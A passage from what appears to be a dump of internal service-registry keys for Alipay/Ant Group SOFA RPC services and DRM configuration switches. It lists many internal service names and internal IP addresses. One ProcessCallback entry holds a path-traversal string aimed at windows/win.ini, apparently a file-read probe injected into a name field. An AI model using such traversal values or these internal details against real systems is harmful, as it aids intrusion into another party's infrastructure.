#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.inspectprod.common.service.trigger.inspect.InspectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilepromo.common.service.facade.ad.PromoAdObjectMangerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.irecon.common.service.facade.fund.api.ReconsileReconLogService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.IndustryNoticeSignFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.drc.rm.endpoint.openapi.ConnectorMonitorOpenApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:policymanager@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.common.resource.PcreditFreeCardTemplateDrm.supportHBFQInstallNums,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbhomepage.common.service.channel.facade.KbChannelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:unitradeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoguard.common.service.facade.risk.api.CampSimulateReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.YebsContractService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.205#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fintransfercore.common.service.facade.transfer.FinPledgeDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.workorder.drm.InsWorkorderCardDRM.cancelCardUserId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.imif.common.service.facade.v2.MerchantCreateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradecsa.common.service.facade.golding.BatchGoldingServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.excelFileSizeLimitInBytes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilechat.common.service.facade.api.EmotionV2Facade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.182#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.23.177.244#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.52.236.90#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insmarketingprod.common.service.facade.mng.campaign.InsMktProdRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.ptcore.common.service.facade.api.value.ValueLibraryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.login.LoginCredentialServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.antlottery.AntLotteryCodeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:pricecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgopen.container.facade.api.KgOnlineServiceInvokeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.checkroute.common.service.trigger.CheckRouteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.finsupport.component.cache.ctrldata.drm.NuccWhiteListDRM.mulSgwRouterSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.discount.common.service.facade.group.DiscountProgressQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.167.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.warehouse.vdps.facade.metric.MetricServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.salary.UserBillFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.taobao.recommendplatform.client.Recommend:1.0:1.0.0.daily@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.enterprisesteward.account.EnterpriseStewardAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.bizlogicide.common.service.facade.api.BizMutexChangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.biz.service.gw.news.api.special.SpecialGwManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bioperation.service.facade.api.LocalProxyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmarket.rec.service.PreditCommonDynamicContentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.RccenterDataBaseTableInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alphad.common.service.facade.odps.api.IOdpsTableFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.taskcenter.TaskTmpDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:girisk@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.commom.service.facade.CharityLegoQueryGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finquotationcenter.common.service.facade.api.indicator.IndicatorCalcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.242.229#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilecodec.component.service.impl.mocker.ProcessMocker:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.biz.manager.clearingstat.ClearingChannelStatManage:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_RPC_TRANSMIT_LIFECORE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreCzoneTairCache_dest.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcomment.rpc.CommunityRpc:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundbankcore.common.service.facade.FundBankNoTradeOneStepFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:vostroVoucherAcceptedExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.203#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mcommerceprod.common.service.facade.wireless.ZoneManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.prophet.SeasonMasterRecFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.CertifyAppealFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCache_dest.watchMember,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.speech.api.backtrace.BacktraceSpeechFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bcm.common.service.facade.managerapi.CertManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.sentence.facade.SentenceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pricecenter.common.service.facade.api.template.TemplateConditionOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.amsAssistantTBaseCache.watchMember,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.common.security.dresource.SecurityCommonDrm.escapeSchemeChecks,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.huanyu.facade.change.ChangePlanCallback:1.0:securityops@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloandecision.service.facade.consult.CustOrgQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zdal.ldc.tair.testCacheTbase.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcenter.common.dal.mdata.auto.daointerface.BizFundReportDAO:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.linka:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.sqlCommonRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finance.goldetfprod.common.service.facade.api.CustodyTransferFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.gotone.common.service.api.SendIvrService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","SOFA_PRC_TRANSMIT_REVCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antassistant.common.service.facade.api.ada.AdaRobotService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmerchantprod.common.service.facade.permit.MerchantPermitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.biztype.BizTypeQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finresprod.service.facade.api.receipt.ReceiptQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.127.59#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openhome.facade.IsvTaskMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.serializeBlackListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dataphin.resource.ide.facade.api.IdeRecycleOpenService:1.0:dpresource@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcbenefitcore.benefit.point.invalid@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.community.drm.CommunityDrm.forbiddenPublishReply,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_C_PUC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.custcenter.bizservice.facade.cache.CustCacheManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalCrc,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mgw-app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recruitcore.facade.api.content.ContentManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.127.91#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.114.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.findecision:name=com.alipay.common.security.dresource.SecurityCommonDrm.corsWhiteUrls,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.riskinsight.biz.service.impl.decisionlog.StrategyLogQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstoreapp.common.service.facade.store.query.StoreAssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskdatacenter.service.facade.hpa.PortraitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_OPENEVAL#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csplatform.service.facade.api.AppointmentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instdispute.facade.api.DisputeCheckLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpromocenter.recruit.platform.service.facade.api.ItemTemplateQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileaix.common.service.facade.ModelHistoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommons.common.spi.api.ArtisanComponentSpiFacade:1.0:ylbInfoSpi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.192.12#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.lowercaseFirst:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.accountOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.recmars.common.service.facade.hyp.HYPCheckCacheFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.179.49#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cfpcenter:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInBizValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.custdecision.service.questionnaire.QuestionnaireQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zpaas:name=com.alipay.zpaas.biz.ops.OperationDrm.restart,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialcore.facade.iot.promote.IotPromoteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revtrans:name=com.alipay.revtrans.core.model.drm.RevtransDrmImpl.cacheAccountType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.175.128#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:rc_smart_ai_process_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandQueueSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pointprod.commom.manage.facade.budget.api.BudgetLibEditControlService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.creditacceptance.common.service.facade.CaConfigQueryRZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:mobilecashier@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.cif.drm.PasswordRevokeSwitch.simplePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.arcore.common.service.contract.facade.Contract4MngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csrobot.service.facade.mng.api.SystemUserMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmarket.jiebeipromo.service.PcreditMarketRankEstimateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.common.service.facade.api.InsSellerVersionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clairvoyant.common.service.facade.dataquality.DataQualityFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipGenerateDRMResource.switch4SerialGenerate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.imerchprod.module.merchant.facade.api.LabelManageService:1.0:globalsite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.pkg.MiniAppPackageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.122.92#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promocenter.facade.api.giftpackage.SaleGiftPackageActivityQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileic.matrix.service.facade.spi.MatrixQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsnsbff:name=com.alipay.finsnsbff.label.editor.isFlowLimitRiskEvaluation,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.tradeexprod:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBack:1.0:ihkprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-openpunish-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:objectPropertyImportProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:openFormAuditProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.53.62#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbservindustryprod.common.service.facade.reservation.ReservationRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.thor.service.ThorLineageMappingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.product.facade.AssetProductIotQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/����/����/����/����/����/����/����/����/����/����/windows/win.ini@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rulecenter.facade.common.RulePublishResultService:1.0:rulepub@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:developertool_iterationConfig_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsearch.common.service.facade.api.buffettConfig.BuffettDedupChargeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcommerceprod.common.service.facade.wireless.IndustryConfigImportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandQueueSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finsupport:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.supergw.service.facade.transaction.MessageReceiveService:1.0:approdcenter_openapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.finrtcenter.EvaluationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_capitalRansomCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.config.api.BankCodeQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finnet.service.facade.open.api.FinnetApiSendService:1.0:superlink@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.172.93#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.sccounter.facade.AccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.insttrade.biz.service.impl.daemon.driver.DataSplitDriver:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportSampling,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDowngradeDrmImpl.accessRecordDowngrade,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialcore.facade.task.TaskFlowRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fascore.common.service.facade.local.FundApplyPayMsgServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_B_AIR#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.lifemng.facade.ebppgw.InstConfFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.18.116.43#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.msgbroker-tutorial:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:databizcore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctransquery.common.service.facade.api.FundFreezeLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pricemng.common.service.facade.api.price.PriceDescQueryStdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloanamtopt.facade.service.AmountConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.MonthlyBillDrm.showAvgMonthYieldRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cfmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.readCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gfintertrade.common.service.facade.api.InterTradeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:cifmetadata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WishSavingsParamsDRMResource.maxTargetAmount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.caprod.service.ukey.facade.UkeyLostInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accordercore.query.FreezeTypeQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payplus.common.service.facade.spi.IndustryInfoAssembleFacade:1.0:auth_front_pay_info_decision@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctransquery.common.service.facade.api.AccountDailyQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.123.204#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:etetestcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.api.workbench.WorkbenchTaskInFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","io.sofastack.cafe.workflowx.sofarpc.facade.WorkflowxRPCInvocationFacade:1.0:SERVERLESS_PLAN_SF_ANT_VIP@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInGlobalSwitchValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpromoscene.common.service.facade.api.asset.FinsRecordQueryCurZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findefencecore.common.service.anna.facade.ReplayQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.excashier.biz.standard.service.payment.PaymentCallbackService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.OrderLinkConsistQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctransquery.common.service.facade.api.VoucherAccountLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.retry.task.execute.RetryOrderDRMResource.subTaskSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fraudmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.shadowReadCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.core.migrate.drm.SceneMigrateTaskDrm.loadSyncDataOrderBy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@csactive#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.instdatalink.common.service.facade.databus.DataBusGZFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csplatform.service.facade.api.GuideserviceFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofaops.common.service.facade.ConfigServerDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcreditdmp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloan.lend.queryclient.LendCountQueryClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincoretechdss.service.facade.api.AcctransQueryClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0:cstask_indentityDemotionPreJudgeProcessTaskCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.common.event.UniformEventMessageListener:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:kbcontent@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.170.181#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paydecisioncarina.service.spi.agent.AgentService:1.0:instfluxdecision@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_RCCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zscale.cluster.service.ClusterEventReceiverFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.AssetTransferService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkassetmore.common.service.facade.api.AssetManageProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:openapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.finriskcenter.common.facade.api.guardian.ActionInstanceServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.126.61#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cloudinc:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.logLevelMap,ver